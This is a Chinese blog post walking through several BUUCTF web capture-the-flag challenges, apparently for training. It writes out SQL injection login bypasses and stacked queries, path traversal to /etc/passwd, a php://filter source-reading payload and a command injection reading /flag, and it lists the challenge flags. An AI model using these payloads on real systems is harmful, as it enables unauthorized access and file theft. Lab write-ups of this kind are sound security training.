BUUCTF——Web篇

已于 2024-05-09 14:44:28 修改
阅读量608 收藏 15
点赞数 20
分类专栏: 安全攻防 文章标签: 安全 sql web安全
于 2024-05-09 14:41:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46022776/article/details/138592384
版权

[极客大挑战 2019]EasySQL

  • 弱密码

在这里插入图片描述

在这里插入图片描述

  • 加单引号

ADMIN’
123456

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘123456’’ at line 1

在这里插入图片描述

ADMIN
123456’

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘123456’’’ at line 1在这里插入图片描述

  • sql 注入

ADMIN’ OR 1#
123456

select * from users where username=‘ADMIN’ OR 1#'And password=‘123456’
在这里插入图片描述

ADMIN
123456’ OR 1#

select * from users where username=‘ADMIN’ and password= ‘123456’ OR 1#’

在这里插入图片描述

ADMIN
123456’ || 1#

OR 换成 || 一样的效果
在这里插入图片描述

FLAG

flag{be372315-05de-40e4-b24b-61dafe434364}

全部复制粘贴,不要只复制括号里的部分!!

[极客大挑战 2019]Havefun

在这里插入图片描述

在这里插入图片描述

FLAG

在这里插入图片描述

flag{4edf0e3c-ff14-4e3b-842f-3db91fa54f34}

[HCTF 2018]WarmUp

打开F12
在这里插入图片描述
追加source.php
在这里插入图片描述
换成追加hint.php,flag不在这,提示在ffffllllaaaagggg
在这里插入图片描述
换成ffffllllaaaagggg,报错。
在这里插入图片描述
?,打回原形,啥都没有。
在这里插入图片描述

前面加/?file=,即/?file=hint.php等于/hint.php
在这里插入图片描述
/?file=ffffllllaaaagggg,看不到
在这里插入图片描述

FLAG

一级一级往上找/?file=hint.php?../../../../../ffffllllaaaagggg
在这里插入图片描述

flag{d244c7c5-d90d-4e99-b45f-3c0ea3877dc0}

[ACTF2020 新生赛]Include1

?file=../../../../../../../../../../../../../../../../etc/passwd
在这里插入图片描述

文件包含漏洞

  • php://filter 用于读取源码
  • php://input 用于执行php代码
php://filter/read=convert.base64-encode/resource=xxx  # 用base64编码的方式来读文件flag.php

FLAG

/?file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7OTZhYmE3YTgtOGY1NC00MDQxLWFjNTEtODA3ZmU1NjY2NzNmfQo=

Base64解码https://www.toolhelper.cn/EncodeDecode/Base64

在这里插入图片描述

flag{96aba7a8-8f54-4041-ac51-807fe566673f}

[ACTF2020 新生赛]Exec1

在这里插入图片描述
ip=127.0.0||ls
在这里插入图片描述

FLAG

ip=127.0.0||cat /flag

在这里插入图片描述

flag{81cfb443-3b4c-44ef-88e4-59c973e2755d}

[SUCTF 2019]EasySQL1

1,2
在这里插入图片描述
order
在这里插入图片描述

1;show databases;在这里插入图片描述

1; show tables;
在这里插入图片描述

FLAG

*,1
在这里插入图片描述

flag{48283e65-0311-4248-8cf8-7d547adc6b9a}

未完待续

Autumn7299
关注
  • 20
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF部分web题目
05-06
写题记录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装
qq_43684686的博客
06-17 342
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装。重新执行安装程安装到 d:\a-vm。在D盘新建一个文件夹a-vm,
如何确保数据跨域交换安全、合规、可追溯性?
文件数据安全交换
06-14 590
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
【启明智显产品分享】Model3工业级HMI芯片详解系列专题(三):安全、稳定、高防护
ami82的博客
06-20 382
Model3芯片具备高达8KV的ESD HBM防护,在恶劣的工业环境中能够抵抗各种电磁干扰,提升系统可靠性;Model3芯片支持高精度电子脉宽调制(EPWM)控制,能够满足复杂电机控制和精细过程控制的需要,在控制应用中更加精准;Model3芯片内置4线电阻触摸屏驱动,为用户提供便捷的交互途径,降低了外围BOM成本。
企业防盗版,如何保障上网安全
最新发布
shenxinda_lu的博客
06-20 164
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 692
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
如何隐藏真实的MAC地址和IP地址,保证多账户的安全
vmlogin888的博客
06-18 450
在计算机网络中,MAC地址(Media Access Control Address)和IP地址(Internet Protocol Address)是两个重要的概念,用于网络设备之间的通信。虽然它们都用于标识设备,但在运作原理和作用上有着明显的区别。
HSE在企业中的重要性:健康、安全与环境的全面保障
shuntian88的博客
06-18 441
通过健康风险评估、安全培训、风险管理和环境保护措施,企业不仅保障员工的健康和安全,还推动环境的可持续发展。定期监测员工的健康状况,及时发现和处理与工作环境相关的健康问题,预防职业病,确保员工保持良好的身体状态,提高工作效率和满意度。系统化的风险评估和管理,预防健康、安全和环境风险,减少事故和职业病的发生,保障员工和环境的安全。通过有效的HSE管理,企业在员工、社会和环境之间实现良好平衡,促进各方利益的共同发展。健康安全的工作环境和高效的资源管理,提升员工工作效率,优化企业运营流程。HSE管理的综合效益。
网络与协议安全复习 - 电子邮件安全
infinity_heaven的博客
06-13 733
PGP、S/MIME、DKIM
餐饮食堂安全守护者:可燃气体报警器故障处理与检测要点解析
BDjiance的博客
06-17 386
在餐饮食堂中,可燃气体报警器的正常运行对于预防火灾和保障人员安全至关重要。接下来,佰德将围绕可燃气体报警器的故障现象识别、原因排查、安全操作准则、专业工具与备件、故障处理步骤、验证与测试以及维护与保养建议等方面进行详细阐述,帮助相关人员更好地应对可燃气体报警器故障。
【功能详解】银河麒麟操作系统“安全启动”是如何发挥作用的?
银河麒麟操作系统的博客
06-17 471
安全体系的构建离不开操作系统本身的硬实力,更离不开与上下游伙伴用户产品合力共建。其中,安全启动(Secure Boot)作为一项至关重要的安全技术,成为现代计算机系统安全的一道坚固防线,尤其在搭载国产操作系统与UEFI(统一可扩展固件接口)的设备上,展现出了非凡的安全
【ARM 安全系列介绍 3.7 -- SM4 对称加密算】
CodingCos的博客
06-15 1030
SM4是一种分组对称加密标准,由中国国家密码管理局所制定,属于国家商用密码算法系列之一。它在国内广泛用于金融、电子政务等领域的数据保护。分组长度:128位。密钥长度:128位。轮数:32轮。加密与解密:使用相同的算法结构(轮函数和轮密钥生成算法相同),密钥调度算法产生的轮密钥顺序相反。SM 系列主要分为 SM2、SM3、SM4。其中SM2为非对称加密算法SM3为哈希摘要算法SM4为对称加密算法。
Windows CSC服务特权提升漏洞(CVE-2024-26229)
做自己喜欢的事,并将其发挥到极致!
06-17 599
(CVE-2024-26229)Windows CSC服务特权提升漏洞,csc.sys驱动程序中带有METHOD_NEITHER I/O控制代码的IOCTL地址验证不正确。当IOCTL使用METHOD_NEITHER选项进行I/O控制时,IOCTL有责任验证提供给它的地址,如果验证缺失或不正确,攻击者可以提供任意内存地址,从而导致代码执行或拒绝服务。
数据治理在数据提取中的角色:确保数据质量和安全
weixin_44835050的博客
06-20 369
数据治理在数据提取过程中扮演着至关重要的角色,它不仅能够确保数据的准确性和安全性,还能够促进数据的共享和协同。在数字化时代,企业应充分认识到数据治理的重要性,并积极探索和实践数据治理的最佳路径,以构建更加完善的数据治理体系,为企业的发展提供坚实的数据支持。
注册安全分析报告:PingPong
Explinks的博客
06-18 1065
图形验证及交互验证方式的安全性到底如何?请看具体分析。
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值